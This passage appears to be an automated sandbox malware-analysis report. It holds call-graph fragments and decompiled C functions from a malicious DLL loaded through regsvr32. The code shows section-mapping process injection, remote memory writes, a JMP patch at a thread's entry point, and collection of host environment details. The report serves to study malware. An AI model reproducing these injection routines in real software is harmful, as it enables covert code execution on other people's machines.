18995->18997 18996 6d5051f7 18996->18978 18997->18996 18998 6d5151f2 11 API calls 18997->18998 18998->18996 19000 6d505e8e 18999->19000 19003 6d505a57 18999->19003 19000->18988 19001 6d505ae2 LoadLibraryA 19001->19003 19002 6d505dd0 GetProcAddress 19002->19003 19003->19000 19003->19001 19003->19002 19003->19003 19004->18829 19006 27a65b5 19005->19006 19011 27a660d 19005->19011 19034 27a8d5b HeapCreate 19006->19034 19008 27a65ba 19035 27a972e 19008->19035 19011->18829 19018 27a6608 19020 27a8d41 2 API calls 19018->19020 19019 27a6612 19055 27a8d41 19019->19055 19020->19011 19027 27a6669 CreateThread 19027->19011 19135 27a6348 19027->19135 19028 27af159 8 API calls 19029 27a6644 19028->19029 19068 27a6420 memset 19029->19068 19034->19008 19087 27a8d70 RtlAllocateHeap 19035->19087 19037 27a65bf 19038 27b3d53 19037->19038 19039 27b3d88 19038->19039 19088 27a8dd5 19039->19088 19041 27a65cd 19042 27af159 19041->19042 19092 27a9f75 19042->19092 19045 27af17b GetModuleHandleA 19048 27af18a 19045->19048 19046 27af183 LoadLibraryA 19046->19048 19047 27af198 19100 27a8d2e 19047->19100 19048->19047 19095 27af10e 19048->19095 19052 27a9f8f 19118 27a8c4a 19052->19118 19054 27a65f4 GetFileAttributesW 19054->19018 19054->19019 19056 27a6617 19055->19056 19057 27a8d4f 19055->19057 19059 27a109a 19056->19059 19058 27a8d86 2 API calls 19057->19058 19058->19056 19060 27a8c4a 2 API calls 19059->19060 19061 27a10b5 19060->19061 19062 27a9e52 19061->19062 19063 27a9e6e 19062->19063 19067 27a662b 19063->19067 19124 27a8d70 RtlAllocateHeap 19063->19124 19065 27a9e81 19066 27a8d86 2 API calls 19065->19066 19065->19067 19066->19067 19067->19027 19067->19028 19125 27a1080 19068->19125 19070 27a644a 19071 27a645b 19070->19071 19072 27a649c 19070->19072 19074 27a1080 2 API calls 19071->19074 19073 27a1080 2 API calls 19072->19073 19075 27a64a6 19073->19075 19076 27a6465 19074->19076 19080 27a8d2e 2 API calls 19075->19080 19128 27a9faf 19076->19128 19078 27a647b 19079 27a8d2e 2 API calls 
19078->19079 19081 27a6486 19079->19081 19080->19081 19082 27a8d86 19081->19082 19083 27a6659 19082->19083 19084 27a8d90 19082->19084 19083->19027 19084->19083 19085 27a8f0a memset 19084->19085 19086 27a8dc0 HeapFree 19085->19086 19086->19083 19087->19037 19091 27a8d70 RtlAllocateHeap 19088->19091 19090 27a8de6 19090->19041 19091->19090 19104 27a8b74 19092->19104 19111 27a8d70 RtlAllocateHeap 19095->19111 19097 27af14f 19097->19047 19099 27af120 19099->19097 19112 27aefb8 19099->19112 19101 27a65e3 19100->19101 19102 27a8d36 19100->19102 19101->19052 19103 27a8d86 2 API calls 19102->19103 19103->19101 19106 27a8b8b 19104->19106 19109 27a8bac 19104->19109 19105 27a8bf3 lstrlenW 19107 27a8bff 19105->19107 19106->19109 19110 27a8d70 RtlAllocateHeap 19106->19110 19107->19045 19107->19046 19109->19105 19109->19107 19110->19109 19111->19099 19113 27af02c 19112->19113 19114 27aefd1 19112->19114 19113->19099 19114->19113 19115 27af084 LoadLibraryA 19114->19115 19115->19113 19116 27af092 GetProcAddress 19115->19116 19116->19113 19117 27af09e 19116->19117 19117->19113 19120 27a8c6b 19118->19120 19119 27a8cd8 lstrlenW 19123 27a8d70 RtlAllocateHeap 19119->19123 19120->19119 19120->19120 19122 27a8cf2 19122->19054 19122->19122 19123->19122 19124->19065 19126 27a8b74 2 API calls 19125->19126 19127 27a1096 19126->19127 19127->19070 19132 27a8f0a 19128->19132 19131 27a9fdd 19131->19078 19133 27a8f13 memset 19132->19133 19134 27a8f24 _vsnprintf 19132->19134 19133->19134 19134->19131 19147 27a64c2 19135->19147 19139 27a6359 19141 27a6393 19139->19141 19146 27a6363 19139->19146 19209 27ad907 19139->19209 19148 27af159 8 API calls 19147->19148 19149 27a64d6 19148->19149 19150 27af159 8 API calls 19149->19150 19151 27a64ef 19150->19151 19152 27af159 8 API calls 19151->19152 19153 27a6508 19152->19153 19154 27af159 8 API calls 19153->19154 19155 27a6521 19154->19155 19156 27af159 8 API calls 19155->19156 19157 27a653c 19156->19157 19158 27af159 8 API calls 19157->19158 19159 27a6555 
19158->19159 19160 27af159 8 API calls 19159->19160 19161 27a656e 19160->19161 19162 27af159 8 API calls 19161->19162 19163 27a6587 19162->19163 19164 27af159 8 API calls 19163->19164 19165 27a634d GetOEMCP 19164->19165 19166 27ae040 19165->19166 19256 27a8d70 RtlAllocateHeap 19166->19256 19168 27ae05b 19169 27ae066 GetCurrentProcessId 19168->19169 19208 27ae3bb 19168->19208 19170 27ae07e 19169->19170 19257 27aca1b 19170->19257 19208->19139 19256->19168 20604 6d51518a 20603->20604 20605 6d51519f 20603->20605 20606 6d515750 2 API calls 20604->20606 20607 6d515195 20605->20607 20608 6d5151b2 CreateFileA 20605->20608 20606->20607 20607->18841 20608->20607 20608->20608 20957 6d5082b2 20958 6d5082be ___scrt_is_nonwritable_in_current_image 20957->20958 20959 6d5082e7 dllmain_raw 20958->20959 20961 6d5082e2 20958->20961 20963 6d5082cd ___scrt_is_nonwritable_in_current_image 20958->20963 20960 6d508301 dllmain_crt_dispatch 20959->20960 20959->20963 20960->20961 20960->20963 20971 6d514ed7 20961->20971 20964 6d508322 20965 6d50834e 20964->20965 20967 6d514ed7 2 API calls 20964->20967 20965->20963 20966 6d508357 dllmain_crt_dispatch 20965->20966 20966->20963 20968 6d50836a dllmain_raw 20966->20968 20969 6d50833a dllmain_crt_dispatch dllmain_raw 20967->20969 20970 6d50839c 20968->20970 20969->20965 20970->20963 20972 6d514ee4 GetProcessHeap HeapAlloc 20971->20972 20973 6d514f28 ___scrt_fastfail 20971->20973 20972->20973 20973->20964 23005 27a1295 23006 27aaaba 4 API calls 23005->23006 23007 27a12ac 23006->23007 23008 27a12d1 23007->23008 23009 27b36f2 2 API calls 23007->23009 23043 27a117d 23008->23043 23009->23008 23012 27aab8d 4 API calls 23013 27a1316 23012->23013 23042 27a13d4 23013->23042 23050 27a7c0e 23013->23050 23014 27ab316 4 API calls 23016 27a13eb 23014->23016 23018 27ab403 5 API calls 23016->23018 23020 27a13f7 23018->23020 23019 27a133d 23027 27a8d86 2 API calls 23019->23027 23238 27a7a4e 23020->23238 23021 27aab8d 4 API calls 23024 27a1368 23021->23024 23023 
27ab316 4 API calls 23026 27a138d 23023->23026 23035 27a1371 23024->23035 23065 27a6935 23024->23065 23216 27ab403 23026->23216 23031 27a1306 23027->23031 23028 27a142c 23267 27a110a 23028->23267 23034 27a143e 23034->23019 23038 27a110a 8 API calls 23034->23038 23035->23023 23036 27a1438 23277 27a10ba 23036->23277 23038->23036 23042->23014 23044 27a9f75 2 API calls 23043->23044 23045 27a118e 23044->23045 23046 27a9ba4 2 API calls 23045->23046 23047 27a11aa 23046->23047 23048 27a8d2e 2 API calls 23047->23048 23049 27a11b7 23048->23049 23049->23012 23049->23031 23285 27a7e5c 23050->23285 23052 27a7c2b 23063 27a1334 23052->23063 23296 27a769f 23052->23296 23054 27a7c55 23064 27a7c5c 23054->23064 23313 27a7639 23054->23313 23055 27a8d86 2 API calls 23056 27a7c97 23055->23056 23057 27a8d86 2 API calls 23056->23057 23059 27a7ca2 23057->23059 23061 27a8d86 2 API calls 23059->23061 23061->23063 23063->23019 23063->23021 23063->23035 23064->23055 23571 27a8d70 RtlAllocateHeap 23065->23571 23067 27a694b 23068 27aab09 4 API calls 23067->23068 23215 27a6e47 23067->23215 23069 27a6960 23068->23069 23572 27afd5a 23069->23572 23074 27a9a5a RtlAllocateHeap 23075 27a6984 23074->23075 23076 27a9a5a RtlAllocateHeap 23075->23076 23077 27a6998 23076->23077 23078 27a69bd 23077->23078 23080 27a9a5a RtlAllocateHeap 23077->23080 23079 27a9a5a RtlAllocateHeap 23078->23079 23081 27a69e2 23079->23081 23080->23078 23598 27ae8c9 23081->23598 23087 27a6a51 23088 27a6a76 23087->23088 23645 27a8d70 RtlAllocateHeap 23087->23645 23089 27a109a 2 API calls 23088->23089 23091 27a6aa5 23089->23091 23646 27ab84b 23091->23646 23092 27a6a62 23092->23088 23094 27abba6 memset 23092->23094 23094->23088 23096 27a8d41 2 API calls 23097 27a6abf 23096->23097 23098 27a109a 2 API calls 23097->23098 23099 27a6acb 23098->23099 23100 27ab84b 5 API calls 23099->23100 23101 27a6ad6 23100->23101 23215->23035 23217 27aaaba 4 API calls 23216->23217 23218 27ab415 23217->23218 23219 27aa202 GetSystemTimeAsFileTime 

            Control-flow Graph

            C-Code - Quality: 95%
            			E027AD54A(void* __ecx, intOrPtr __edx) {
            				void* _v8;
            				void* _v12;
            				void* _v16;
            				void* _v20;
            				long _v24;
            				long _v28;
            				short _v32;
            				char _v36;
            				intOrPtr* _v40;
            				intOrPtr _v44;
            				long _v48;
            				void* _v52;
            				void* _v53;
            				char _v64;
            				short _v68;
            				struct _WNDCLASSEXA _v116;
            				char _t81;
            				intOrPtr* _t83;
            				intOrPtr _t87;
            				intOrPtr _t90;
            				char _t97;
            				short _t98;
            				intOrPtr _t105;
            				long _t107;
            				char _t119;
            				void* _t124;
            				struct HWND__* _t132;
            				void* _t138;
            				void* _t147;
            				void* _t154;
            				intOrPtr _t155;
            				intOrPtr _t157;
            				void* _t158;
            				void* _t163;
            				void* _t165;
            
            				_t81 =  *0x27bf8e4; // 0x47ffc00
            				_t138 = 0;
            				_v12 = __ecx;
            				_t157 = __edx;
            				_v20 = 0;
            				_v52 = 0;
            				_v48 = 0;
            				_v16 = 0;
            				_v8 = 0;
            				_v24 = 0;
            				_v44 = __edx;
            				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
            					E027AF1DB(0x1f4);
            				}
            				_t12 = _t157 + 0x3c; // 0x852c50ff
            				_t83 =  *_t12 + _t157;
            				_v28 = _t138;
            				_v40 = _t83;
            				if( *_t83 != 0x4550) {
            					L14:
            					_t158 = _v12;
            					L15:
            					if(_v8 != _t138) {
            						_t90 =  *0x27bf9e0; // 0x47ffa00
            						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
            						_v8 = _t138;
            					}
            					L17:
            					if(_v16 != 0) {
            						_t87 =  *0x27bf8e0; // 0x47ff8c0
            						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
            					}
            					if(_v20 != 0) {
            						NtClose(_v20);
            					}
            					return _v8;
            				}
            				_v52 =  *((intOrPtr*)(_t83 + 0x50));
            				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
            					goto L14;
            				}
            				_t97 =  *"18293"; // 0x39323831
            				_v36 = _t97;
            				_t98 =  *0x27bce70; // 0x33
            				_v32 = _t98;
            				_v116.lpszClassName =  &_v64;
            				asm("movsd");
            				_v116.lpfnWndProc = DefWindowProcW;
            				_v116.cbWndExtra = _t138;
            				asm("movsd");
            				_v116.style = 0xb;
            				_v116.lpszMenuName = _t138;
            				_v116.cbSize = 0x30;
            				asm("movsb");
            				_v116.cbClsExtra = _t138;
            				_v116.hInstance = _t138;
            				if(RegisterClassExA( &_v116) != 0) {
            					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
            					if(_t132 != 0) {
            						DestroyWindow(_t132);
            						UnregisterClassA( &_v64, _t138);
            					}
            				}
            				_t105 =  *0x27bf8e0; // 0x47ff8c0
            				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
            				_t158 = _v12;
            				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
            					goto L15;
            				} else {
            					_t154 = E027A8DD5( *0x27bf8e4, 0x1ac4);
            					_v36 = _t154;
            					if(_t154 == 0) {
            						goto L15;
            					}
            					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
            					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
            					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
            					E027A8D86( &_v36, 0x1ac4);
            					_t119 =  *0x27bf8e4; // 0x47ffc00
            					_t155 =  *0x27bf8f8; // 0x27a0000
            					_v36 = _t119;
            					 *0x27bf8f8 = _v8;
            					 *0x27bf8e4 = _t163;
            					E027A8E4D(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
            					E027AD4C9(_v16, _v8, _v44);
            					_t124 = E027AA5DA("Jjischug");
            					_v53 = _t138;
            					_t147 = 0xf;
            					if(_t124 > _t147) {
            						do {
            							L12:
            							_t63 = _t138 + 0x41; // 0x41
            							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
            							_t138 = _t138 + 1;
            						} while (_t138 < _t147);
            						L13:
            						lstrlenW( &_v68);
            						 *0x27bf8f8 = _t155;
            						 *0x27bf8e4 = _v36;
            						goto L17;
            					}
            					_t147 = _t124;
            					if(_t147 == 0) {
            						goto L13;
            					}
            					goto L12;
            				}
            			}

            APIs
            • NtCreateSection.NTDLL(027ADA85,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 027AD5BC
            • RegisterClassExA.USER32(?), ref: 027AD610
            • CreateWindowExA.USER32 ref: 027AD63B
            • DestroyWindow.USER32(00000000), ref: 027AD646
            • UnregisterClassA.USER32 ref: 027AD651
            • NtMapViewOfSection.NTDLL(027ADA85,00000000), ref: 027AD67C
            • NtMapViewOfSection.NTDLL(027ADA85,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 027AD6A3
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 027AD6E9
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 027AD703
              • Part of subcall function 027A8D86: HeapFree.KERNEL32(00000000,00000000), ref: 027A8DCC
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,027A623D), ref: 027AD77B
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 027AD7C3
            • NtClose.NTDLL(00000000), ref: 027AD7D7
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: 7f5a317bb03c852440d36c21eece35e01ba378b34bf48856123ffe652e963338
            • Instruction ID: 8c0a1b8e4b406b4184640a12c356837528f0a35f9c539987d40a6b621dbfcbd6
            • Opcode Fuzzy Hash: 7f5a317bb03c852440d36c21eece35e01ba378b34bf48856123ffe652e963338
            • Instruction Fuzzy Hash: 428125B5E40219AFDB11DFA8DC89EEEBBB8FB08714F14456AF604A7650D730A900CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 79%
            			E027AE040(void* __fp0) {
            				char _v8;
            				char _v12;
            				char _v16;
            				char _v144;
            				char _v656;
            				char _v668;
            				char _v2644;
            				void* __esi;
            				struct _OSVERSIONINFOA* _t68;
            				intOrPtr _t70;
            				void* _t71;
            				intOrPtr _t73;
            				void* _t74;
            				intOrPtr _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr _t80;
            				intOrPtr _t81;
            				intOrPtr _t87;
            				int _t90;
            				intOrPtr _t92;
            				void* _t93;
            				void* _t97;
            				intOrPtr _t99;
            				intOrPtr _t101;
            				short _t106;
            				char _t108;
            				intOrPtr _t113;
            				intOrPtr _t116;
            				intOrPtr _t119;
            				intOrPtr _t123;
            				intOrPtr _t134;
            				intOrPtr _t136;
            				intOrPtr _t138;
            				intOrPtr _t141;
            				intOrPtr _t143;
            				intOrPtr _t148;
            				void* _t149;
            				WCHAR* _t150;
            				char* _t151;
            				intOrPtr _t162;
            				intOrPtr _t177;
            				void* _t191;
            				struct _OSVERSIONINFOA* _t192;
            				void* _t193;
            				void* _t195;
            				char _t198;
            				void* _t199;
            				char* _t200;
            				void* _t203;
            				int* _t204;
            				void* _t216;
            
            				_t216 = __fp0;
            				_t148 =  *0x27bf8f8; // 0x27a0000
            				_t68 = E027A8D70(0x1ac4);
            				_t192 = _t68;
            				if(_t192 != 0) {
            					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
            					_t70 =  *0x27bf8e0; // 0x47ff8c0
            					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
            					_t3 = _t192 + 0x648; // 0x648
            					E027B35C6( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
            					_t73 =  *0x27bf8e0; // 0x47ff8c0
            					_t5 = _t192 + 0x1644; // 0x1644
            					_t194 = _t5;
            					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
            					_t207 = _t74;
            					if(_t74 != 0) {
            						 *((intOrPtr*)(_t192 + 0x1854)) = E027A9790(_t194, _t207);
            					}
            					_t75 =  *0x27bf8e0; // 0x47ff8c0
            					_t77 = E027ACA1B( *((intOrPtr*)(_t75 + 0x12c))()); // executed
            					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
            					_t159 =  *_t77;
            					if(E027ACB96( *_t77) == 0) {
            						_t79 = E027ACA6B(_t159, _t194); // executed
            						__eflags = _t79;
            						_t162 = (0 | _t79 > 0x00000000) + 1;
            						__eflags = _t162;
            						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
            					} else {
            						 *((intOrPtr*)(_t192 + 0x214)) = 3;
            					}
            					_t14 = _t192 + 0x220; // 0x220, executed
            					_t80 = E027AF420(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
            					_t81 = E027AF3E5(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
            					_t17 = _t192 + 0x114; // 0x114
            					_t195 = _t17;
            					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
            					_push( &_v16);
            					_v12 = 0x80;
            					_push( &_v8);
            					_v8 = 0x100;
            					_push( &_v656);
            					_push( &_v12);
            					_push(_t195);
            					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
            					_t87 =  *0x27bf8e8; // 0x47ffab0
            					_push(0); // executed
            					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
            						GetLastError();
            					}
            					_t90 = GetSystemMetrics(0x1000);
            					_t28 = _t192 + 0x228; // 0x228
            					_t149 = _t28;
            					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
            					E027AE039(_t149); // executed
            					_t211 = _t149;
            					if(_t149 != 0) {
            						 *((intOrPtr*)(_t192 + 0x434)) = E027A9790(_t149, _t211);
            					}
            					_t92 = E027AC86B();
            					_t33 = _t192 + 0xb0; // 0xb0
            					_t196 = _t33;
            					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
            					_t93 = E027AC65E(_t92, _t33, _t211, _t216);
            					_t35 = _t192 + 0xd0; // 0xd0
            					E027A9B7C(_t93, _t33, _t35);
            					_t36 = _t192 + 0x438; // 0x438
            					E027A97AA(_t149, _t36);
            					_t97 = E027AE3C8(_t196, E027AA5DA(_t33), 0);
            					_t37 = _t192 + 0x100c; // 0x100c
            					E027AC881(_t97, _t37, _t216);
            					_t99 =  *0x27bf8e0; // 0x47ff8c0
            					_t101 = E027ACBE8( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
            					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
            					E027A8F0A(_t192, 0, 0x9c);
            					_t204 = _t203 + 0xc;
            					_t192->dwOSVersionInfoSize = 0x9c;
            					GetVersionExA(_t192);
            					 *((intOrPtr*)(_t192 + 0xa8)) = E027ADE3C(_t100);
            					_t106 = E027ADE65(_t105);
            					_t41 = _t192 + 0x1020; // 0x1020
            					_t150 = _t41;
            					 *((short*)(_t192 + 0x9c)) = _t106;
            					GetWindowsDirectoryW(_t150, 0x104);
            					_t108 = E027A9F8F(_t105, 0x7c4);
            					_t177 =  *0x27bf8e0; // 0x47ff8c0
            					_t198 = _t108;
            					 *_t204 = 0x104;
            					_push( &_v668);
            					_push(_t198);
            					_v8 = _t198;
            					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
            						_t143 =  *0x27bf8e0; // 0x47ff8c0
            						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
            					}
            					E027A8D41( &_v8);
            					_t113 =  *0x27bf8e0; // 0x47ff8c0
            					_t48 = _t192 + 0x1434; // 0x1434
            					_t199 = _t48;
            					 *_t204 = 0x209;
            					_push(_t199);
            					_push(L"USERPROFILE");
            					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
            						E027A9FEE(_t199, 0x105, L"%s\\%s", _t150);
            						_t141 =  *0x27bf8e0; // 0x47ff8c0
            						_t204 =  &(_t204[5]);
            						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
            					}
            					_push(0x20a);
            					_t51 = _t192 + 0x122a; // 0x122a
            					_t151 = L"TEMP";
            					_t116 =  *0x27bf8e0; // 0x47ff8c0
            					_push(_t151);
            					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
            						_t138 =  *0x27bf8e0; // 0x47ff8c0
            						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
            					}
            					_push(0x40);
            					_t200 = L"SystemDrive";
            					_push( &_v144);
            					_t119 =  *0x27bf8e0; // 0x47ff8c0
            					_push(_t200);
            					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
            						_t136 =  *0x27bf8e0; // 0x47ff8c0
            						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
            					}
            					_v8 = 0x7f;
            					_t59 = _t192 + 0x199c; // 0x199c
            					_t123 =  *0x27bf8e0; // 0x47ff8c0
            					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
            					_t62 = _t192 + 0x100c; // 0x100c
            					E027B35C6(E027AE3C8(_t62, E027AA5DA(_t62), 0),  &_v2644);
            					_t63 = _t192 + 0x1858; // 0x1858
            					E027B3598( &_v2644, _t63, 0x20);
            					_push( &_v2644);
            					_push(0x1e);
            					_t66 = _t192 + 0x1878; // 0x1878
            					_t191 = 0x14;
            					E027A9877(_t66, _t191);
            					_t134 = E027ADBE6(_t191); // executed
            					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
            					return _t192;
            				}
            				return _t68;
            			}

            APIs
              • Part of subcall function 027A8D70: RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            • GetCurrentProcessId.KERNEL32 ref: 027AE067
            • GetLastError.KERNEL32 ref: 027AE161
            • GetSystemMetrics.USER32(00001000), ref: 027AE171
            • GetVersionExA.KERNEL32(00000000), ref: 027AE226
              • Part of subcall function 027ACA6B: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,027A0000), ref: 027ACB0F
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 027AE251
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: bbdd13c4b39f3a134473d316c46ea9f51d9e90aa984e7786bb1508b66a9e1536
            • Instruction ID: 09b50049d4d1dd44d90f112a579491af4198d055cb78a4841412d8ca75d21ce7
            • Opcode Fuzzy Hash: bbdd13c4b39f3a134473d316c46ea9f51d9e90aa984e7786bb1508b66a9e1536
            • Instruction Fuzzy Hash: BD91BE71B00605AFD706EB74C858FEAB7E9FF48710F00466AF51AD7280DB74AA548FA1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 126 27ada5c-27ada75 call 27ad31d 129 27ada7b-27ada89 call 27ad54a 126->129 130 27adb4e-27adb59 call 27ad48e 126->130 129->130 135 27ada8f-27adac6 call 27a8f0a GetThreadContext 129->135 135->130 138 27adacc-27adb0c NtProtectVirtualMemory 135->138 139 27adb0e-27adb29 NtWriteVirtualMemory 138->139 140 27adb4c 138->140 139->140 141 27adb2b-27adb4a NtProtectVirtualMemory 139->141 140->130 141->130 141->140
            C-Code - Quality: 100%
            			E027ADA5C(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
            				long _v8;
            				long _v12;
            				void* _v16;
            				intOrPtr _v23;
            				void _v24;
            				long _v28;
            				struct _CONTEXT _v744;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t33;
            				void* _t57;
            				long _t59;
            				void* _t62;
            				void** _t65;
            				void* _t66;
            
            				_t65 = __edx;
            				_t57 = __ecx;
            				_t66 = 0;
            				if(E027AD31D(__ecx, __edx, __edx, 0) != 0) {
            					_t33 = E027AD54A( *((intOrPtr*)(__edx)), _a4); // executed
            					_t66 = _t33;
            					if(_t66 != 0) {
            						E027A8F0A( &_v744, 0, 0x2cc);
            						_v744.ContextFlags = 0x10002;
            						if(GetThreadContext(_t65[1],  &_v744) != 0) {
            							_t62 = _v744.Eax;
            							_v12 = _v12 & 0x00000000;
            							_v24 = 0xe9;
            							_t59 = 5;
            							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
            							_v8 = _t59;
            							_v16 = _t62;
            							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
            								L6:
            								_t66 = 0;
            							} else {
            								_v28 = _v28 & 0x00000000;
            								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
            									goto L6;
            								}
            							}
            						}
            					}
            				}
            				E027AD48E();
            				return _t66;
            			}

            APIs
              • Part of subcall function 027AD31D: LoadLibraryW.KERNEL32 ref: 027AD415
              • Part of subcall function 027AD54A: NtCreateSection.NTDLL(027ADA85,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 027AD5BC
              • Part of subcall function 027AD54A: RegisterClassExA.USER32(?), ref: 027AD610
              • Part of subcall function 027AD54A: CreateWindowExA.USER32 ref: 027AD63B
              • Part of subcall function 027AD54A: DestroyWindow.USER32(00000000), ref: 027AD646
              • Part of subcall function 027AD54A: UnregisterClassA.USER32 ref: 027AD651
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 027ADABE
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 027ADB07
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 027ADB24
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 027ADB45
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: e3676114c6a43fc315eeecaefed93be7c74eba805e5ce17cf936151bd9009f7b
            • Instruction ID: 958014457f1b8ed32f2bdc41c7601cb011d7508dfe97adc113194d982badfc71
            • Opcode Fuzzy Hash: e3676114c6a43fc315eeecaefed93be7c74eba805e5ce17cf936151bd9009f7b
            • Instruction Fuzzy Hash: 99312DB6A0110AAFDB21DFA8CD49FEEB7B9EF48754F1042A5EA04E2150D730DB548B91
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 222 6d518a58-6d518ac0 223 6d518f54-6d518f62 222->223 224 6d518ac6-6d518b6e call 6d5050ec 222->224 227 6d518b90-6d518bbf 224->227 228 6d518b70-6d518b7f 224->228 230 6d518bf1-6d518c29 VirtualAlloc 227->230 231 6d518bc1-6d518bd1 227->231 229 6d518b83-6d518b88 228->229 229->229 234 6d518b8a 229->234 232 6d518c42-6d518c91 call 6d509250 call 6d508cd0 230->232 233 6d518c2b-6d518c3c 230->233 235 6d518bd4-6d518be7 231->235 241 6d518f52-6d518f53 232->241 242 6d518c97-6d518c9f 232->242 233->232 234->227 235->235 236 6d518be9-6d518bed 235->236 236->230 241->223 243 6d518ca5-6d518cb7 242->243 244 6d518df4-6d518e03 242->244 245 6d518dc9-6d518dcf 243->245 246 6d518e09-6d518f29 call 6d506bba InitializeCriticalSection 244->246 247 6d518f2b-6d518f36 244->247 248 6d518dd5-6d518def 245->248 249 6d518cbc-6d518ce2 245->249 246->241 247->241 251 6d518f38-6d518f3f 247->251 248->241 252 6d518dc8 249->252 253 6d518ce8-6d518cec 249->253 251->241 255 6d518f41-6d518f4c 251->255 252->245 253->252 256 6d518cf2-6d518cf6 253->256 255->241 256->252 257 6d518cfc-6d518d27 256->257 258 6d518d36-6d518d4d 257->258 259 6d518d29-6d518d30 257->259 260 6d518d73-6d518d94 call 6d508cd0 258->260 261 6d518d4f-6d518d71 258->261 259->258 264 